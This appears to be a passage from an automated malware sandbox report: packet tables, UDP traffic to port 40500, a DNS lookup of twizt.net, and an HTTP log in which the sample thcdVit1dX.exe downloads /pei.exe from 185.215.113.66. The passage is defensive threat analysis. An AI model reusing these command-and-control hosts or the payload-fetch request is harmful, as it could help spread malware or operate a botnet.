                                                                                                                                                        Oct 26, 2024 07:26:34.291522980 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.291534901 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.291536093 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.291557074 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.291587114 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:36.464899063 CEST4978840500192.168.2.5149.54.47.90
                                                                                                                                                        Oct 26, 2024 07:26:36.511399984 CEST4050049788149.54.47.90192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:38.545320988 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:38.545670986 CEST4981280192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:38.551078081 CEST8049812185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:38.551155090 CEST4981280192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:38.551296949 CEST4981280192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:38.551336050 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:38.551393032 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:38.556760073 CEST8049812185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:39.456511021 CEST8049812185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:39.456531048 CEST8049812185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:39.456542969 CEST8049812185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:39.456554890 CEST8049812185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:39.456567049 CEST8049812185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:39.456585884 CEST4981280192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:39.456604004 CEST8049812185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:39.456613064 CEST4981280192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:39.456624031 CEST8049812185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:39.456638098 CEST4981280192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:39.456646919 CEST8049812185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:39.456655979 CEST4981280192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:39.456670046 CEST8049812185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:39.456686974 CEST4981280192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:39.456701040 CEST4981280192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:39.457607031 CEST4981280192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:39.457628012 CEST4981280192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:40.466260910 CEST4982380192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:40.477344990 CEST8049823185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:40.477518082 CEST4982380192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:40.477576971 CEST4982380192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:40.482857943 CEST8049823185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:41.389425039 CEST8049823185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:41.389451981 CEST8049823185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:41.389468908 CEST8049823185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:41.389489889 CEST8049823185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:41.389504910 CEST8049823185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:41.389520884 CEST8049823185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:41.389535904 CEST8049823185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:41.389553070 CEST8049823185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:41.389569044 CEST4982380192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:41.389569044 CEST4982380192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:41.389650106 CEST4982380192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:41.465442896 CEST4982940500192.168.2.589.33.234.8
                                                                                                                                                        Oct 26, 2024 07:26:41.470726967 CEST405004982989.33.234.8192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:41.470827103 CEST4982940500192.168.2.589.33.234.8
                                                                                                                                                        Oct 26, 2024 07:26:41.472419977 CEST4982940500192.168.2.589.33.234.8
                                                                                                                                                        Oct 26, 2024 07:26:41.477749109 CEST405004982989.33.234.8192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:41.477807999 CEST4982940500192.168.2.589.33.234.8
                                                                                                                                                        Oct 26, 2024 07:26:41.483130932 CEST405004982989.33.234.8192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:42.155122995 CEST4050049788149.54.47.90192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:42.155188084 CEST4978840500192.168.2.5149.54.47.90
                                                                                                                                                        Oct 26, 2024 07:26:42.647948980 CEST405004982989.33.234.8192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:42.698966980 CEST4982940500192.168.2.589.33.234.8
                                                                                                                                                        Oct 26, 2024 07:26:42.955670118 CEST405004982989.33.234.8192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:42.995825052 CEST4982940500192.168.2.589.33.234.8
                                                                                                                                                        Oct 26, 2024 07:26:43.135077953 CEST4982940500192.168.2.589.33.234.8
                                                                                                                                                        Oct 26, 2024 07:26:43.140431881 CEST405004982989.33.234.8192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:43.140506029 CEST4982940500192.168.2.589.33.234.8
                                                                                                                                                        Oct 26, 2024 07:26:43.145859957 CEST405004982989.33.234.8192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:43.197953939 CEST4982940500192.168.2.589.33.234.8
                                                                                                                                                        Oct 26, 2024 07:26:43.203277111 CEST405004982989.33.234.8192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:43.203345060 CEST4982940500192.168.2.589.33.234.8
                                                                                                                                                        Oct 26, 2024 07:26:43.208683968 CEST405004982989.33.234.8192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:43.563544035 CEST405004982989.33.234.8192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:43.604784012 CEST4982940500192.168.2.589.33.234.8
                                                                                                                                                        Oct 26, 2024 07:26:43.615372896 CEST405004982989.33.234.8192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:43.655961990 CEST4982940500192.168.2.589.33.234.8
                                                                                                                                                        Oct 26, 2024 07:26:43.661324978 CEST405004982989.33.234.8192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:43.661374092 CEST4982940500192.168.2.589.33.234.8
                                                                                                                                                        Oct 26, 2024 07:26:43.666768074 CEST405004982989.33.234.8192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:43.764127016 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:43.770195007 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:43.770289898 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:43.770405054 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:43.775641918 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:43.777103901 CEST4982940500192.168.2.589.33.234.8
                                                                                                                                                        Oct 26, 2024 07:26:43.782968044 CEST405004982989.33.234.8192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:43.783035994 CEST4982940500192.168.2.589.33.234.8
                                                                                                                                                        Oct 26, 2024 07:26:44.712740898 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.712759018 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.712769985 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.712780952 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.712857962 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.712857962 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.712871075 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.712889910 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.712903023 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.712913036 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.712924004 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.712943077 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.712946892 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.712975025 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.713061094 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.718314886 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.718327045 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.718338013 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.718350887 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.718411922 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.718444109 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.890561104 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.890573025 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.890589952 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.890608072 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.890625954 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.890634060 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.890640020 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.890652895 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.890665054 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.890727043 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.891453981 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.891597986 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.891604900 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.891649961 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.891732931 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.891792059 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.891835928 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.891848087 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.891860008 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.891881943 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.891911030 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.892501116 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.892513037 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.892529011 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.892549992 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.892561913 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.892611980 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.892611980 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.892611980 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.892648935 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.893392086 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.893403053 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.893414021 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.893429041 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.893440962 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.893460035 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.893477917 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:44.896028996 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.896107912 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:44.896212101 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.068409920 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.068429947 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.068443060 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.068515062 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.068526983 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.068536997 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.068578959 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.068579912 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.068579912 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.068785906 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.068799019 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.068809986 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.068823099 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.068835020 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.068850040 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.068850040 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.068919897 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.069119930 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069159985 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069217920 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.069261074 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069272995 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069283962 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069295883 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069329977 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.069329977 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.069391966 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.069534063 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069545984 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069555998 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069588900 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069602013 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069612980 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069623947 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069634914 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.069669008 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.069669008 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.069669008 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.069766045 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.070065022 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.070127964 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.070138931 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.070151091 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.070171118 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.070200920 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.070203066 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.070215940 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.070228100 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.070240974 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.070246935 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.070252895 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.070286036 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.070354939 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.070789099 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.070801020 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.070818901 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.070830107 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.070843935 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.070854902 CEST804984191.202.233.141192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:45.070856094 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.070864916 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.070885897 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:45.070930958 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:47.465996981 CEST4982380192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:47.466281891 CEST4986480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:47.471595049 CEST8049864185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:47.471712112 CEST4986480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:47.471759081 CEST8049823185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:47.471864939 CEST4982380192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:47.471978903 CEST4986480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:47.477277994 CEST8049864185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:48.392946005 CEST8049864185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:48.392954111 CEST8049864185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:48.392997980 CEST8049864185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:48.393008947 CEST4986480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:48.393053055 CEST8049864185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:48.393059015 CEST4986480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:48.393068075 CEST8049864185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:48.393091917 CEST8049864185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:48.393107891 CEST8049864185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:48.393130064 CEST8049864185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:48.393132925 CEST4986480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:48.393146038 CEST8049864185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:48.393151045 CEST4986480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:48.393161058 CEST8049864185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:48.393172026 CEST4986480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:48.393179893 CEST4986480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:48.393258095 CEST4986480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:48.394001007 CEST4986480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:48.394113064 CEST4986480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:48.398509979 CEST8049864185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:48.398534060 CEST8049864185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:48.398549080 CEST8049864185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:48.398564100 CEST8049864185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:48.398571968 CEST4986480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:48.398633003 CEST4986480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:48.398674011 CEST4986480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:48.794172049 CEST4987340500192.168.2.589.249.62.7
                                                                                                                                                        Oct 26, 2024 07:26:48.799488068 CEST405004987389.249.62.7192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:48.799572945 CEST4987340500192.168.2.589.249.62.7
                                                                                                                                                        Oct 26, 2024 07:26:48.801171064 CEST4987340500192.168.2.589.249.62.7
                                                                                                                                                        Oct 26, 2024 07:26:48.806695938 CEST405004987389.249.62.7192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:48.806751966 CEST4987340500192.168.2.589.249.62.7
                                                                                                                                                        Oct 26, 2024 07:26:48.812099934 CEST405004987389.249.62.7192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:51.435188055 CEST4984180192.168.2.591.202.233.141
                                                                                                                                                        Oct 26, 2024 07:26:51.435215950 CEST4987340500192.168.2.589.249.62.7

                                                                                                                                                        UDP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Oct 26, 2024 07:26:19.836764097 CEST5467753192.168.2.51.1.1.1
                                                                                                                                                        Oct 26, 2024 07:26:19.849327087 CEST53546771.1.1.1192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.655013084 CEST6505340500192.168.2.5195.82.3.15
                                                                                                                                                        Oct 26, 2024 07:26:38.654037952 CEST6505340500192.168.2.52.184.189.189
                                                                                                                                                        Oct 26, 2024 07:26:43.670932055 CEST6505340500192.168.2.5151.246.159.157
                                                                                                                                                        Oct 26, 2024 07:26:48.687298059 CEST6505340500192.168.2.52.180.10.247

                                                                                                                                                        DNS Queries

                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                        Oct 26, 2024 07:26:19.836764097 CEST192.168.2.51.1.1.10x3149Standard query (0)twizt.netA (IP address)IN (0x0001)false

                                                                                                                                                        DNS Answers

                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                        Oct 26, 2024 07:26:13.463243961 CEST1.1.1.1192.168.2.50xea11No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                        Oct 26, 2024 07:26:13.463243961 CEST1.1.1.1192.168.2.50xea11No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                        Oct 26, 2024 07:26:14.755975008 CEST1.1.1.1192.168.2.50x8cf5No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                        Oct 26, 2024 07:26:14.755975008 CEST1.1.1.1192.168.2.50x8cf5No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                        Oct 26, 2024 07:26:19.849327087 CEST1.1.1.1192.168.2.50x3149No error (0)twizt.net185.215.113.66A (IP address)IN (0x0001)false

                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                        • 185.215.113.66
                                                                                                                                                        • twizt.net
                                                                                                                                                        • 91.202.233.141

                                                                                                                                                        HTTP Packets

                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        0192.168.2.549720185.215.113.66807256C:\Users\user\Desktop\thcdVit1dX.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Oct 26, 2024 07:26:16.809123039 CEST281OUTGET /pei.exe HTTP/1.1
                                                                                                                                                        Accept: */*
                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                        Host: 185.215.113.66
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Oct 26, 2024 07:26:17.704734087 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Sat, 26 Oct 2024 05:26:17 GMT
                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                        Content-Length: 9728
                                                                                                                                                        Last-Modified: Wed, 15 May 2024 14:33:59 GMT
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        ETag: "6644c7d7-2600"
                                                                                                                                                        Accept-Ranges: bytes
